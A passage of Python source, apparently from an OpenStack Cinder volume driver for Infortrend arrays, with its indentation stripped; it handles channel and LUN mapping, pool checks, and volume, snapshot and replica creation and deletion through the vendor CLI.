def _init_channel_list(self):
self.channel_list = {
'slot_a': [],
'slot_b': [],
}
tmp_channel_list = (
self.configuration.infortrend_slots_a_channels_id.split(',')
)
self.channel_list['slot_a'] = (
[channel.strip() for channel in tmp_channel_list]
)
tmp_channel_list = (
self.configuration.infortrend_slots_b_channels_id.split(',')
)
self.channel_list['slot_b'] = (
[channel.strip() for channel in tmp_channel_list]
)
def _execute_command(self, cli_type, *args, **kwargs):
command = getattr(cli, cli_type)
return command(self.cli_conf).execute(*args, **kwargs)
def _execute(self, cli_type, *args, **kwargs):
LOG.debug('Executing command type: %(type)s.', {'type': cli_type})
rc, out = self._execute_command(cli_type, *args, **kwargs)
if rc != 0:
if ('warning' in CLI_RC_FILTER[cli_type] and
rc in CLI_RC_FILTER[cli_type]['warning']):
LOG.warning(CLI_RC_FILTER[cli_type]['warning'][rc])
else:
msg = CLI_RC_FILTER[cli_type]['error']
LOG.error(msg)
raise exception.InfortrendCliException(
err=msg, param=args, rc=rc, out=out)
return rc, out
@log_func
def _init_map_info(self, multipath=False):
if not self.map_dict_init:
rc, channel_info = self._execute('ShowChannel')
if 'BID' in channel_info[0]:
self._model_type = 'R'
else:
self._model_type = 'G'
self._set_channel_id(channel_info, 'slot_a', multipath)
if multipath and self._model_type == 'R':
self._set_channel_id(channel_info, 'slot_b', multipath)
self.map_dict_init = True
@log_func
def _update_map_info(self, multipath=False):
"""Record the driver mapping information.
map_dict = {
'slot_a': {
'0': [1, 2, 3, 4] # Slot A Channel 0 map lun 1, 2, 3, 4
},
'slot_b' : {
'1': [0, 1, 3] # Slot B Channel 1 map lun 0, 1, 3
}
}
"""
rc, map_info = self._execute('ShowMap')
self._update_map_info_by_slot(map_info, 'slot_a')
if multipath and self._model_type == 'R':
self._update_map_info_by_slot(map_info, 'slot_b')
return map_info
@log_func
def _update_map_info_by_slot(self, map_info, slot_key):
for key, value in self.map_dict[slot_key].items():
self.map_dict[slot_key][key] = list(
range(self.constants['MAX_LUN_MAP_PER_CHL']))
if len(map_info) > 0 and isinstance(map_info, list):
for entry in map_info:
ch = entry['Ch']
lun = entry['LUN']
if ch not in self.map_dict[slot_key].keys():
continue
target_id = self.target_dict[slot_key][ch]
if (entry['Target'] == target_id and
int(lun) in self.map_dict[slot_key][ch]):
self.map_dict[slot_key][ch].remove(int(lun))
def _check_initiator_has_lun_map(self, initiator_info, map_info):
if not isinstance(initiator_info, list):
initiator_info = (initiator_info,)
for initiator_name in initiator_info:
for entry in map_info:
if initiator_name.lower() == entry['Host-ID'].lower():
return True
return False
@log_func
def _set_channel_id(
self, channel_info, controller='slot_a', multipath=False):
if self.protocol == 'iSCSI':
check_channel_type = ('NETWORK', 'LAN')
else:
check_channel_type = ('FIBRE', 'Fibre')
for entry in channel_info:
if entry['Type'] in check_channel_type:
if entry['Ch'] in self.channel_list[controller]:
self.map_dict[controller][entry['Ch']] = []
if self.protocol == 'iSCSI':
self._update_mcs_dict(
entry['Ch'], entry['MCS'], controller)
self._update_target_dict(entry, controller)
@log_func
def _update_target_dict(self, channel, controller):
"""Record the target id for mapping.
# R model
target_dict = {
'slot_a': {
'0': '0',
'1': '0',
},
'slot_b': {
'0': '1',
'1': '1',
},
}
# G model
target_dict = {
'slot_a': {
'2': '32',
'3': '112',
}
}
"""
if self._model_type == 'G':
self.target_dict[controller][channel['Ch']] = channel['ID']
else:
if controller == 'slot_a':
self.target_dict[controller][channel['Ch']] = channel['AID']
else:
self.target_dict[controller][channel['Ch']] = channel['BID']
def _update_mcs_dict(self, channel_id, mcs_id, controller):
"""Record the iSCSI MCS topology.
# R model with mcs, but it not working with iSCSI multipath
mcs_dict = {
'slot_a': {
'0': ['0', '1'],
'1': ['2']
},
'slot_b': {
'0': ['0', '1'],
'1': ['2']
}
}
# G model with mcs
mcs_dict = {
'slot_a': {
'0': ['0', '1'],
'1': ['2']
},
'slot_b': {}
}
"""
if mcs_id not in self.mcs_dict[controller]:
self.mcs_dict[controller][mcs_id] = []
self.mcs_dict[controller][mcs_id].append(channel_id)
def _check_tiers_setup(self):
tiering = self.configuration.infortrend_tiering
if tiering != '0':
self._check_extraspec_value(
tiering, self.tiering_values)
tier_levels_list = list(range(int(tiering)))
tier_levels_list = list(map(str, tier_levels_list))
rc, lv_info = self._execute('ShowLV', 'tier')
for pool in self.pool_list:
support_tier_levels = tier_levels_list[:]
for entry in lv_info:
if (entry['LV-Name'] == pool and
entry['Tier'] in support_tier_levels):
support_tier_levels.remove(entry['Tier'])
if len(support_tier_levels) == 0:
break
if len(support_tier_levels) != 0:
msg = _('Please create %(tier_levels)s '
'tier in pool %(pool)s in advance!') % {
'tier_levels': support_tier_levels,
'pool': pool}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _check_pools_setup(self):
pool_list = self.pool_list[:]
rc, lv_info = self._execute('ShowLV')
for lv in lv_info:
if lv['Name'] in pool_list:
pool_list.remove(lv['Name'])
if len(pool_list) == 0:
break
if len(pool_list) != 0:
msg = _('Please create %(pool_list)s pool in advance!') % {
'pool_list': pool_list}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def check_for_setup_error(self):
self._check_pools_setup()
self._check_tiers_setup()
def create_volume(self, volume):
"""Create a Infortrend partition."""
volume_id = volume['id'].replace('-', '')
self._create_partition_by_default(volume)
part_id = self._get_part_id(volume_id)
system_id = self._get_system_id(self.ip)
model_dict = {
'system_id': system_id,
'partition_id': part_id,
}
model_update = {
"provider_location": self._concat_provider_location(model_dict),
}
LOG.info(_LI('Create Volume %(volume_id)s completed.'), {
'volume_id': volume_id})
return model_update
def _create_partition_by_default(self, volume):
pool_id = self._get_target_pool_id(volume)
self._create_partition_with_pool(volume, pool_id)
def _create_partition_with_pool(
self, volume, pool_id, extraspecs=None):
volume_id = volume['id'].replace('-', '')
volume_size = gi_to_mi(volume['size'])
if extraspecs is None:
extraspecs = self._get_extraspecs_dict(volume['volume_type_id'])
provisioning = self._get_extraspecs_value(extraspecs, 'provisioning')
tiering = self._get_extraspecs_value(extraspecs, 'tiering')
extraspecs_dict = {}
cmd = ''
if provisioning == 'thin':
provisioning = int(volume_size * 0.2)
extraspecs_dict['provisioning'] = provisioning
extraspecs_dict['init'] = 'disable'
else:
self._check_extraspec_value(
provisioning, self.provisioning_values)
if tiering != '0':
self._check_extraspec_value(
tiering, self.tiering_values)
tier_levels_list = list(range(int(tiering)))
tier_levels_list = list(map(str, tier_levels_list))
self._check_tiering_existing(tier_levels_list, pool_id)
extraspecs_dict['provisioning'] = 0
extraspecs_dict['init'] = 'disable'
if extraspecs_dict:
cmd = self._create_part_parameters_str(extraspecs_dict)
commands = (pool_id, volume_id, 'size=%s' % int(volume_size), cmd)
self._execute('CreatePartition', *commands)
def _create_part_parameters_str(self, extraspecs_dict):
parameters_list = []
parameters = {
'provisioning': 'min=%sMB',
'tiering': 'tier=%s',
'init': 'init=%s',
}
for extraspec in extraspecs_dict.keys():
value = parameters[extraspec] % (extraspecs_dict[extraspec])
parameters_list.append(value)
cmd = ' '.join(parameters_list)
return cmd
def _check_tiering_existing(self, tier_levels, pool_id):
rc, lv_info = self._execute('ShowLV', 'tier')
for entry in lv_info:
if entry['LV-ID'] == pool_id and entry['Tier'] in tier_levels:
tier_levels.remove(entry['Tier'])
if len(tier_levels) == 0:
break
if len(tier_levels) != 0:
msg = _('Have not created %(tier_levels)s tier(s).') % {
'tier_levels': tier_levels}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
@log_func
def _create_map_with_lun_filter(
self, part_id, channel_id, lun_id, host, controller='slot_a'):
host_filter = self._create_target_id_and_host_filter(
controller, host)
target_id = self.target_dict[controller][channel_id]
commands = (
'part', part_id, channel_id, target_id, lun_id, host_filter
)
self._execute('CreateMap', *commands)
@log_func
def _create_map_with_mcs(
self, part_id, channel_list, lun_id, host, controller='slot_a'):
map_channel_id = None
for channel_id in channel_list:
host_filter = self._create_target_id_and_host_filter(
controller, host)
target_id = self.target_dict[controller][channel_id]
commands = (
'part', part_id, channel_id, target_id, lun_id,
host_filter
)
rc, out = self._execute('CreateMap', *commands)
if rc == 0:
map_channel_id = channel_id
break
if map_channel_id is None:
msg = _('Failed to create map on mcs, no channel can map.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return map_channel_id
def _create_target_id_and_host_filter(self, controller, host):
if self.protocol == 'iSCSI':
host_filter = 'iqn=%s' % host
else:
host_filter = 'wwn=%s' % host
return host_filter
def _get_extraspecs_dict(self, volume_type_id):
extraspecs = {}
if volume_type_id:
extraspecs = volume_types.get_volume_type_extra_specs(
volume_type_id)
return extraspecs
def _get_extraspecs_value(self, extraspecs, key):
value = None
if key == 'provisioning':
if (extraspecs and
'infortrend_provisioning' in extraspecs.keys()):
value = extraspecs['infortrend_provisioning'].lower()
else:
value = self.configuration.infortrend_provisioning.lower()
elif key == 'tiering':
value = self.configuration.infortrend_tiering
return value
def _select_most_free_capacity_pool_id(self, lv_info):
largest_free_capacity_gb = 0.0
dest_pool_id = None
for lv in lv_info:
if lv['Name'] in self.pool_list:
available_space = float(lv['Available'].split(' ', 1)[0])
free_capacity_gb = round(mi_to_gi(available_space))
if free_capacity_gb > largest_free_capacity_gb:
largest_free_capacity_gb = free_capacity_gb
dest_pool_id = lv['ID']
return dest_pool_id
def _get_target_pool_id(self, volume):
extraspecs = self._get_extraspecs_dict(volume['volume_type_id'])
pool_id = None
rc, lv_info = self._execute('ShowLV')
if 'pool_name' in extraspecs.keys():
poolname = extraspecs['pool_name']
for entry in lv_info:
if entry['Name'] == poolname:
pool_id = entry['ID']
else:
pool_id = self._select_most_free_capacity_pool_id(lv_info)
if pool_id is None:
msg = _('Failed to get pool id with volume %(volume_id)s.') % {
'volume_id': volume['id']}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return pool_id
def _get_system_id(self, system_ip):
rc, device_info = self._execute('ShowDevice')
for entry in device_info:
if system_ip == entry['Connected-IP']:
return str(int(entry['ID'], 16))
return
@log_func
def _get_lun_id(self, ch_id, controller='slot_a'):
lun_id = -1
if len(self.map_dict[controller][ch_id]) > 0:
lun_id = self.map_dict[controller][ch_id][0]
self.map_dict[controller][ch_id].remove(lun_id)
if lun_id == -1:
msg = _('LUN number is out of bound '
'on channel id: %(ch_id)s.') % {'ch_id': ch_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
return lun_id
@log_func
def _get_mapping_info(self, multipath):
if self.iscsi_multipath or multipath:
return self._get_mapping_info_with_mcs()
else:
return self._get_mapping_info_with_normal()
def _get_mapping_info_with_mcs(self):
"""Get the minimun mapping channel id and multi lun id mapping info.
# R model with mcs
map_chl = {
'slot_a': ['0', '1']
}
map_lun = ['0']
# G model with mcs
map_chl = {
'slot_a': ['1', '2']
}
map_lun = ['0']
:returns: minimun mapping channel id per slot and multi lun id
"""
map_chl = {
'slot_a': []
}
min_lun_num = 0
map_mcs_group = None
for mcs in self.mcs_dict['slot_a']:
if len(self.mcs_dict['slot_a'][mcs]) > 1:
if min_lun_num < self._get_mcs_channel_lun_map_num(mcs):
min_lun_num = self._get_mcs_channel_lun_map_num(mcs)
map_mcs_group = mcs
if map_mcs_group is None:
msg = _('Raid did not have MCS Channel.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
map_chl['slot_a'] = self.mcs_dict['slot_a'][map_mcs_group]
map_lun = self._get_mcs_channel_lun_map(map_chl['slot_a'])
return map_chl, map_lun, map_mcs_group
def _get_mcs_channel_lun_map_num(self, mcs_id):
lun_num = 0
for channel in self.mcs_dict['slot_a'][mcs_id]:
lun_num += len(self.map_dict['slot_a'][channel])
return lun_num
def _get_mcs_channel_lun_map(self, channel_list):
"""Find the common lun id in mcs channel."""
map_lun = []
for lun_id in range(self.constants['MAX_LUN_MAP_PER_CHL']):
check_map = True
for channel_id in channel_list:
if lun_id not in self.map_dict['slot_a'][channel_id]:
check_map = False
if check_map:
map_lun.append(str(lun_id))
break
return map_lun
@log_func
def _get_mapping_info_with_normal(self):
"""Get the minimun mapping channel id and lun id mapping info.
# G model and R model
map_chl = {
'slot_a': ['1']
}
map_lun = ['0']
:returns: minimun mapping channel id per slot and lun id
"""
map_chl = {
'slot_a': []
}
map_lun = []
ret_chl = self._get_minimun_mapping_channel_id('slot_a')
lun_id = self._get_lun_id(ret_chl, 'slot_a')
mcs_id = self._get_mcs_id_by_channel_id(ret_chl)
map_chl['slot_a'].append(ret_chl)
map_lun.append(str(lun_id))
return map_chl, map_lun, mcs_id
@log_func
def _get_minimun_mapping_channel_id(self, controller):
empty_lun_num = 0
min_map_chl = -1
# Sort items to get a reliable behaviour. Dictionary items
# are iterated in a random order because of hash randomization.
for key, value in sorted(self.map_dict[controller].items()):
if empty_lun_num < len(value):
min_map_chl = key
empty_lun_num = len(value)
if int(min_map_chl) < 0:
msg = _('LUN map overflow on every channel.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
return min_map_chl
def _get_common_lun_map_id(self, wwpn_channel_info):
map_lun = None
for lun_id in range(self.constants['MAX_LUN_MAP_PER_CHL']):
lun_id_exist = False
for slot_name in ['slot_a', 'slot_b']:
for wwpn in wwpn_channel_info:
channel_id = wwpn_channel_info[wwpn]['channel']
if channel_id not in self.map_dict[slot_name]:
continue
elif lun_id not in self.map_dict[slot_name][channel_id]:
lun_id_exist = True
if not lun_id_exist:
map_lun = str(lun_id)
break
return map_lun
def _get_mcs_id_by_channel_id(self, channel_id):
mcs_id = None
for mcs in self.mcs_dict['slot_a']:
if channel_id in self.mcs_dict['slot_a'][mcs]:
mcs_id = mcs
break
if mcs_id is None:
msg = _('Cannot get mcs_id by channel id: %(channel_id)s.') % {
'channel_id': channel_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return mcs_id
def _concat_provider_location(self, model_dict):
return '@'.join([i + '^' + str(model_dict[i]) for i in model_dict])
def delete_volume(self, volume):
"""Delete the specific volume."""
volume_id = volume['id'].replace('-', '')
has_pair = False
have_map = False
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
(check_exist, have_map, part_id) = (
self._check_volume_exist(volume_id, part_id)
)
if not check_exist:
LOG.warning(_LW('Volume %(volume_id)s already deleted.'), {
'volume_id': volume_id})
return
rc, replica_list = self._execute('ShowReplica', '-l')
for entry in replica_list:
if (volume_id == entry['Source-Name'] and
part_id == entry['Source']):
if not self._check_replica_completed(entry):
has_pair = True
LOG.warning(_LW('Volume still %(status)s '
'Cannot delete volume.'), {
'status': entry['Status']})
else:
have_map = entry['Source-Mapped'] == 'Yes'
self._execute('DeleteReplica', entry['Pair-ID'], '-y')
elif (volume_id == entry['Target-Name'] and
part_id == entry['Target']):
have_map = entry['Target-Mapped'] == 'Yes'
self._execute('DeleteReplica', entry['Pair-ID'], '-y')
if not has_pair:
rc, snapshot_list = self._execute(
'ShowSnapshot', 'part=%s' % part_id)
for snapshot in snapshot_list:
si_has_pair = self._delete_pair_with_snapshot(
snapshot['SI-ID'], replica_list)
if si_has_pair:
msg = _('Failed to delete SI '
'for volume_id: %(volume_id)s '
'because it has pair.') % {
'volume_id': volume_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
self._execute('DeleteSnapshot', snapshot['SI-ID'], '-y')
rc, map_info = self._execute('ShowMap', 'part=%s' % part_id)
if have_map or len(map_info) > 0:
self._execute('DeleteMap', 'part', part_id, '-y')
self._execute('DeletePartition', part_id, '-y')
LOG.info(_LI('Delete Volume %(volume_id)s completed.'), {
'volume_id': volume_id})
else:
msg = _('Failed to delete volume '
'for volume_id: %(volume_id)s '
'because it has pair.') % {
'volume_id': volume_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _check_replica_completed(self, replica):
if ((replica['Type'] == 'Copy' and replica['Status'] == 'Completed') or
(replica['Type'] == 'Mirror' and
replica['Status'] == 'Mirror')):
return True
return False
def _check_volume_exist(self, volume_id, part_id):
check_exist = False
have_map = False
result_part_id = part_id
rc, part_list = self._execute('ShowPartition', '-l')
for entry in part_list:
if entry['Name'] == volume_id:
check_exist = True
if part_id is None:
result_part_id = entry['ID']
if entry['Mapped'] == 'true':
have_map = True
if check_exist:
return (check_exist, have_map, result_part_id)
else:
return (False, False, None)
def create_cloned_volume(self, volume, src_vref):
"""Create a clone of the volume by volume copy."""
volume_id = volume['id'].replace('-', '')
# Step1 create a snapshot of the volume
src_part_id = self._extract_specific_provider_location(
src_vref['provider_location'], 'partition_id')
if src_part_id is None:
src_part_id = self._get_part_id(volume_id)
model_update = self._create_volume_from_volume(volume, src_part_id)
LOG.info(_LI('Create Cloned Volume %(volume_id)s completed.'), {
'volume_id': volume['id']})
return model_update
def _create_volume_from_volume(self, dst_volume, src_part_id):
# create the target volume for volume copy
dst_volume_id = dst_volume['id'].replace('-', '')
self._create_partition_by_default(dst_volume)
dst_part_id = self._get_part_id(dst_volume_id)
# prepare return value
system_id = self._get_system_id(self.ip)
model_dict = {
'system_id': system_id,
'partition_id': dst_part_id,
}
model_info = self._concat_provider_location(model_dict)
model_update = {"provider_location": model_info}
# clone the volume from the origin partition
commands = (
'Cinder-Cloned', 'part', src_part_id, 'part', dst_part_id
)
self._execute('CreateReplica', *commands)
self._wait_replica_complete(dst_part_id)
return model_update
def _extract_specific_provider_location(self, provider_location, key):
provider_location_dict = self._extract_all_provider_location(
provider_location)
result = provider_location_dict.get(key, None)
return result
@log_func
def _extract_all_provider_location(self, provider_location):
provider_location_dict = {}
dict_entry = provider_location.split("@")
for entry in dict_entry:
key, value = entry.split('^', 1)
if value == 'None':
value = None
provider_location_dict[key] = value
return provider_location_dict
def create_export(self, context, volume):
model_update = volume['provider_location']
LOG.info(_LI('Create export done from Volume %(volume_id)s.'), {
'volume_id': volume['id']})
return {'provider_location': model_update}
def get_volume_stats(self, refresh=False):
"""Get volume status.
If refresh is True, update the status first.
"""
if self._volume_stats is None or refresh:
self._update_volume_stats()
LOG.info(_LI(
'Successfully update volume stats. '
'backend: %(volume_backend_name)s, '
'vendor: %(vendor_name)s, '
'driver version: %(driver_version)s, '
'storage protocol: %(storage_protocol)s.'), self._volume_stats)
return self._volume_stats
def _update_volume_stats(self):
backend_name = self.configuration.safe_get('volume_backend_name')
data = {
'volume_backend_name': backend_name,
'vendor_name': 'Infortrend',
'driver_version': self.VERSION,
'storage_protocol': self.protocol,
'pools': self._update_pools_stats(),
}
self._volume_stats = data
def _update_pools_stats(self):
enable_specs_dict = self._get_enable_specs_on_array()
if 'Thin Provisioning' in enable_specs_dict.keys():
provisioning = 'thin'
provisioning_support = True
else:
provisioning = 'full'
provisioning_support = False
rc, part_list = self._execute('ShowPartition', '-l')
rc, pools_info = self._execute('ShowLV')
pools = []
for pool in pools_info:
if pool['Name'] in self.pool_list:
total_space = float(pool['Size'].split(' ', 1)[0])
available_space = float(pool['Available'].split(' ', 1)[0])
total_capacity_gb = round(mi_to_gi(total_space), 2)
free_capacity_gb = round(mi_to_gi(available_space), 2)
provisioning_factor = self.configuration.safe_get(
'max_over_subscription_ratio')
provisioned_space = self._get_provisioned_space(
pool['ID'], part_list)
provisioned_capacity_gb = round(mi_to_gi(provisioned_space), 2)
new_pool = {
'pool_name': pool['Name'],
'pool_id': pool['ID'],
'total_capacity_gb': total_capacity_gb,
'free_capacity_gb': free_capacity_gb,
'reserved_percentage': 0,
'QoS_support': False,
'provisioned_capacity_gb': provisioned_capacity_gb,
'max_over_subscription_ratio': provisioning_factor,
'thin_provisioning_support': provisioning_support,
'thick_provisioning_support': True,
'infortrend_provisioning': provisioning,
}
pools.append(new_pool)
return pools
def _get_provisioned_space(self, pool_id, part_list):
provisioning_space = 0
for entry in part_list:
if entry['LV-ID'] == pool_id:
provisioning_space += int(entry['Size'])
return provisioning_space
def create_snapshot(self, snapshot):
"""Creates a snapshot."""
snapshot_id = snapshot['id'].replace('-', '')
volume_id = snapshot['volume_id'].replace('-', '')
LOG.debug('Create Snapshot %(snapshot)s volume %(volume)s.',
{'snapshot': snapshot_id, 'volume': volume_id})
model_update = {}
part_id = self._get_part_id(volume_id)
if part_id is None:
msg = _('Failed to get Partition ID for volume %(volume_id)s.') % {
'volume_id': volume_id}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
@lockutils.synchronized(
'snapshot-' + part_id, 'infortrend-', True)
def do_create_snapshot():
self._execute('CreateSnapshot', 'part', part_id)
rc, tmp_snapshot_list = self._execute(
'ShowSnapshot', 'part=%s' % part_id)
return tmp_snapshot_list
snapshot_list = do_create_snapshot()
LOG.info(_LI(
'Create success. '
'Snapshot: %(snapshot)s, '
'Snapshot ID in raid: %(raid_snapshot_id)s, '
'volume: %(volume)s.'), {
'snapshot': snapshot_id,
'raid_snapshot_id': snapshot_list[-1]['SI-ID'],
'volume': volume_id})
model_update['provider_location'] = snapshot_list[-1]['SI-ID']
return model_update
def delete_snapshot(self, snapshot):
"""Delete the snapshot."""
snapshot_id = snapshot['id'].replace('-', '')
volume_id = snapshot['volume_id'].replace('-', '')
LOG.debug('Delete Snapshot %(snapshot)s volume %(volume)s.',
{'snapshot': snapshot_id, 'volume': volume_id})
raid_snapshot_id = self._get_raid_snapshot_id(snapshot)
if raid_snapshot_id:
rc, replica_list = self._execute('ShowReplica', '-l')
has_pair = self._delete_pair_with_snapshot(
raid_snapshot_id, replica_list)
if not has_pair:
self._execute('DeleteSnapshot', raid_snapshot_id, '-y')
LOG.info(_LI('Delete Snapshot %(snapshot_id)s completed.'), {
'snapshot_id': snapshot_id})
else:
msg = _('Failed to delete snapshot '
'for snapshot_id: %s '
'because it has pair.') % snapshot_id
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
msg = _(
'Failed to get Raid Snapshot ID '
'from Snapshot %(snapshot_id)s.') % {
'snapshot_id': snapshot_id}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def _get_raid_snapshot_id(self, snapshot):
if 'provider_location' not in snapshot:
LOG.warning(_LW(
'Failed to get Raid Snapshot ID and '
'did not store in snapshot.'))
return
return snapshot['provider_location']
def _delete_pair_with_snapshot(self, snapshot_id, replica_list):
has_pair = False
for entry in replica_list:
if entry['Source'] == snapshot_id:
if not self._check_replica_completed(entry):
has_pair = True
LOG.warning(_LW(
'Snapshot still %(status)s Cannot delete snapshot.'), {
'status': entry['Status']})
else:
self._execute('DeleteReplica', entry['Pair-ID'], '-y')
return has_pair
def _get_part_id(self, volume_id, pool_id=None, part_list=None):
if part_list is None:
rc, part_list = self._execute('ShowPartition')
for entry in part_list:
if pool_id is None:
if entry['Name'] == volume_id:
return entry['ID']
else:
if entry['Name'] == volume_id and entry['LV-ID'] == pool_id:
return entry['ID']
return
def create_volume_from_snapshot(self, volume, snapshot):
raid_snapshot_id = self._get_raid_snapshot_id(snapshot)
if raid_snapshot_id is None:
msg = _('Failed to get Raid Snapshot ID '
'from snapshot: %(snapshot_id)s.') % {
'snapshot_id': snapshot['id']}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
src_part_id = self._check_snapshot_filled_block(raid_snapshot_id)
model_update = self._create_volume_from_snapshot_id(
volume, raid_snapshot_id, src_part_id)
LOG.info(_LI(
'Create Volume %(volume_id)s from '
'snapshot %(snapshot_id)s completed.'), {
'volume_id': volume['id'],
'snapshot_id': snapshot['id']})
return model_update
def _check_snapshot_filled_block(self, raid_snapshot_id):
rc, snapshot_list = self._execute(
'ShowSnapshot', 'si=%s' % raid_snapshot_id, '-l')
if snapshot_list and snapshot_list[0]['Total-filled-block'] == '0':
return snapshot_list[0]['Partition-ID']
return
def _create_volume_from_snapshot_id(
self, dst_volume, raid_snapshot_id, src_part_id):
# create the target volume for volume copy
dst_volume_id = dst_volume['id'].replace('-', '')
self._create_partition_by_default(dst_volume)
dst_part_id = self._get_part_id(dst_volume_id)
# prepare return value
system_id = self._get_system_id(self.ip)
model_dict = {
'system_id': system_id,
'partition_id': dst_part_id,
}
model_info = self._concat_provider_location(model_dict)
model_update = {"provider_location": model_info}
if src_part_id:
# clone the volume from the origin partition
commands = (
'Cinder-Snapshot', 'part', src_part_id, 'part', dst_part_id
)
self._execute('CreateReplica', *commands)
self._wait_replica_complete(dst_part_id)
# clone the volume from the snapshot
commands = (
'Cinder-Snapshot', 'si', raid_snapshot_id, 'part', dst_part_id
)
self._execute('CreateReplica', *commands)
self._wait_replica_complete(dst_part_id)
return model_update
@lockutils.synchronized('connection', 'infortrend-', True)
def initialize_connection(self, volume, connector):
if self.protocol == 'iSCSI':
multipath = connector.get('multipath', False)
return self._initialize_connection_iscsi(
volume, connector, multipath)
elif self.protocol == 'FC':
return self._initialize_connection_fc(
volume, connector)
else:
msg = _('Unknown protocol: %(protocol)s.') % {
'protocol': self.protocol}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _initialize_connection_fc(self, volume, connector):
self._init_map_info(True)
self._update_map_info(True)
map_lun, target_wwpns, initiator_target_map = (
self._do_fc_connection(volume, connector)
)
properties = self._generate_fc_connection_properties(
map_lun, target_wwpns, initiator_target_map)
LOG.info(_LI('Successfully initialized connection. '
'target_wwn: %(target_wwn)s, '
'initiator_target_map: %(initiator_target_map)s, '
'lun: %(target_lun)s.'), properties['data'])
return properties
def _do_fc_connection(self, volume, connector):
volume_id = volume['id'].replace('-', '')
target_wwpns = []
partition_data = self._extract_all_provider_location(
volume['provider_location'])
part_id = partition_data['partition_id']
if part_id is None:
part_id = self._get_part_id(volume_id)
wwpn_list, wwpn_channel_info = self._get_wwpn_list()
initiator_target_map, target_wwpns = self._build_initiator_target_map(
connector, wwpn_list)
map_lun = self._get_common_lun_map_id(wwpn_channel_info)
# Sort items to get a reliable behaviour. Dictionary items
# are iterated in a random order because of hash randomization.
for initiator_wwpn in sorted(initiator_target_map):
for target_wwpn in initiator_target_map[initiator_wwpn]:
channel_id = wwpn_channel_info[target_wwpn.upper()]['channel']
controller = wwpn_channel_info[target_wwpn.upper()]['slot']
self._create_map_with_lun_filter(
part_id, channel_id, map_lun, initiator_wwpn,
controller=controller)
return map_lun, target_wwpns, initiator_target_map
def _build_initiator_target_map(self, connector, all_target_wwpns):
initiator_target_map = {}
target_wwpns = []
if self.fc_lookup_service:
lookup_map = (
self.fc_lookup_service.get_device_mapping_from_network(
connector['wwpns'], all_target_wwpns)
)
for fabric_name in lookup_map:
fabric = lookup_map[fabric_name]
target_wwpns.extend(fabric['target_port_wwn_list'])
for initiator in fabric['initiator_port_wwn_list']:
initiator_target_map[initiator] = (
fabric['target_port_wwn_list']
)
else:
initiator_wwns = connector['wwpns']
target_wwpns = all_target_wwpns
for initiator in initiator_wwns:
initiator_target_map[initiator] = all_target_wwpns
return initiator_target_map, target_wwpns
def _generate_fc_connection_properties(
self, lun_id, target_wwpns, initiator_target_map):
return {
'driver_volume_type': 'fibre_channel',
'data': {
'target_discovered': True,
'target_lun': int(lun_id),
'target_wwn': target_wwpns,
'initiator_target_map': initiator_target_map,
},
}
@log_func
def _initialize_connection_iscsi(self, volume, connector, multipath):
self._init_map_info(multipath)
self._update_map_info(multipath)
volume_id = volume['id'].replace('-', '')
partition_data = self._extract_all_provider_location(
volume['provider_location']) # system_id, part_id
part_id = partition_data['partition_id']
if part_id is None:
part_id = self._get_part_id(volume_id)
self._set_host_iqn(connector['initiator'])
map_chl, map_lun, mcs_id = self._get_mapping_info(multipath)
lun_id = map_lun[0]
if self.iscsi_multipath or multipath:
channel_id = self._create_map_with_mcs(
part_id, map_chl['slot_a'], lun_id, connector['initiator'])
else:
channel_id = map_chl['slot_a'][0]
self._create_map_with_lun_filter(
part_id, channel_id, lun_id, connector['initiator'])
rc, net_list = self._execute('ShowNet')
ip = self._get_ip_by_channel(channel_id, net_list)
if ip is None:
msg = _(
'Failed to get ip on Channel %(channel_id)s '
'with volume: %(volume_id)s.') % {
'channel_id': channel_id, 'volume_id': volume_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
partition_data = self._combine_channel_lun_target_id(
partition_data, mcs_id, lun_id, channel_id)
property_value = [{
'lun_id': partition_data['lun_id'],
'iqn': self._generate_iqn(partition_data),
'ip': ip,
'port': self.constants['ISCSI_PORT'],
}]
properties = self._generate_iscsi_connection_properties(
property_value, volume)
LOG.info(_LI('Successfully initialized connection '
'with volume: %(volume_id)s.'), properties['data'])
return properties
@log_func
def _combine_channel_lun_target_id(
self, partition_data, mcs_id, lun_id, channel_id):
target_id = self.target_dict['slot_a'][channel_id]
partition_data['mcs_id'] = mcs_id
partition_data['lun_id'] = lun_id
partition_data['target_id'] = target_id
partition_data['slot_id'] = 1
return partition_data
def _set_host_iqn(self, host_iqn):
rc, iqn_list = self._execute('ShowIQN')
check_iqn_exist = False
for entry in iqn_list:
if entry['IQN'] == host_iqn:
check_iqn_exist = True
if not check_iqn_exist:
self._execute(
'CreateIQN', host_iqn, self._truncate_host_name(host_iqn))
def _truncate_host_name(self, iqn):
if len(iqn) > 16:
return iqn[-16:]
else:
return iqn
@log_func
def _generate_iqn(self, partition_data):
return self.iqn % (
partition_data['system_id'],
partition_data['mcs_id'],
partition_data['target_id'],
partition_data['slot_id'])
@log_func
def _get_ip_by_channel(
self, channel_id, net_list, controller='slot_a'):
slot_name = 'slotA' if controller == 'slot_a' else 'slotB'
for entry in net_list:
if entry['ID'] == channel_id and entry['Slot'] == slot_name:
return entry['IPv4']
return
def _get_wwpn_list(self):
rc, wwn_list = self._execute('ShowWWN')
wwpn_list = []
wwpn_channel_info = {}
for entry in wwn_list:
channel_id = entry['CH']
if 'BID' in entry['ID']:
slot_name = 'slot_b'
else:
slot_name = 'slot_a'
if channel_id in self.map_dict[slot_name]:
wwpn_list.append(entry['WWPN'])
wwpn_channel_info[entry['WWPN']] = {
'channel': channel_id,
'slot': slot_name,
}
